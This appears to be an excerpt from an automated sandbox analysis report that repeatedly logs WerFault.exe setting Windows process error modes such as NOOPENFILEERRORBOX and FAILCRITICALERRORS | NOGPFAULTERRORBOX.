                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
